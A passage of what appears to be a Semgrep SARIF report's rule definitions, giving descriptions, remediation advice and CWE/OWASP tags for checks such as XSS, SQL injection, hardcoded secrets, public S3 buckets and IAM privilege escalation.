XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"helpUri":"https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","id":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","name":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express","id":"javascript.express.code.puppeteer-express.puppeteer-express","name":"javascript.express.code.puppeteer-express.puppeteer-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.puppeteer-express.puppeteer-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"help":{"markdown":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter)\n - [https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/](https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/)\n - [https://golang.org/pkg/io/#WriteString](https://golang.org/pkg/io/#WriteString)\n","text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","id":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","name":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli)\n - [https://github.com/MagicStack/asyncpg](https://github.com/MagicStack/asyncpg)\n - [https://magicstack.github.io/asyncpg/current/](https://magicstack.github.io/asyncpg/current/)\n","text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can create parameterized queries like so: 'conn.fetch(\"SELECT $1 FROM table\", value)'. You can also create prepared statements with 'Connection.prepare': 'stmt = conn.prepare(\"SELECT $1 FROM table\"); await stmt.fetch(user_value)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","id":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","name":"python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.asyncpg-sqli.asyncpg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"help":{"markdown":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper)\n","text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper","id":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","name":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-textiowrapper"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli","id":"kotlin.spring.hibernate-sqli.hibernate-sqli","name":"kotlin.spring.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"help":{"markdown":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"help":{"markdown":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html)\n","text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"helpUri":"https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket","id":"json.aws.security.public-s3-bucket.public-s3-bucket","name":"json.aws.security.public-s3-bucket.public-s3-bucket","properties":{"precision":"very-high","tags":["CWE-264: CWE CATEGORY: Permissions, Privileges, and Access Controls","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.public-s3-bucket.public-s3-bucket"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write","id":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","name":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-command-write.dangerous-command-write"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"help":{"markdown":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality)\n - [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)\n - [https://www.whitehatsec.com/blog/magic-hashes/](https://www.whitehatsec.com/blog/magic-hashes/)\n","text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"helpUri":"https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality","id":"php.lang.security.md5-loose-equality.md5-loose-equality","name":"php.lang.security.md5-loose-equality.md5-loose-equality","properties":{"precision":"very-high","tags":["CWE-697: Incorrect Comparison","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.md5-loose-equality.md5-loose-equality"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli)\n - [https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries](https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli","id":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","name":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.sequel-sqli.sequel-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"bcrypt hash detected"},"help":{"markdown":"bcrypt hash detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"bcrypt hash detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","id":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","name":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"help":{"markdown":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs)\n - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/](https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/)\n","text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","id":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","name":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy)\n - [https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html](https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html)\n - [https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html](https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","id":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","name":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","id":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","name":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This gets data from session using user inputs. A malicious user may be able to retrieve information from your session that you didn't intend them to. Do not use user input as a session key."},"help":{"markdown":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation)\n - [https://brakemanscanner.org/docs/warning_types/session_manipulation/](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n","text":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","id":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","name":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Allowing an attacker to manipulate the session may lead to unintended behavior."}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"help":{"markdown":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n","text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file","id":"ruby.rails.security.brakeman.check-send-file.check-send-file","name":"ruby.rails.security.brakeman.check-send-file.check-send-file","properties":{"precision":"very-high","tags":["CWE-73: External Control of File Name or Path","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-send-file.check-send-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","id":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","name":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"help":{"markdown":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","id":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","name":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","id":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","name":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"transferFrom() can steal allowance of other accounts"},"help":{"markdown":"transferFrom() can steal allowance of other accounts\n\nReferences:\n - 